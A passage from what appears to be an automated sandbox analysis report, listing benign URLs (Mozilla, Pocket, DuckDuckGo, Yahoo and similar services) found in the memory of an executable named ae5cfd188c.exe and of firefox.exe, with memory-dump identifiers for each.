Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61C14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000018.00000002.2837480713.000002BA5ADEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889988240.000035F0F6404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2890720669.0000372F1F704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sresource://gre/modules/handlers/HandlerList.sys.mj
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000003.2742255243.000002BA5A163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000018.00000002.2889075369.00002786E1B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A72F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2725783431.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2723839104.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2725783431.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2723839104.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
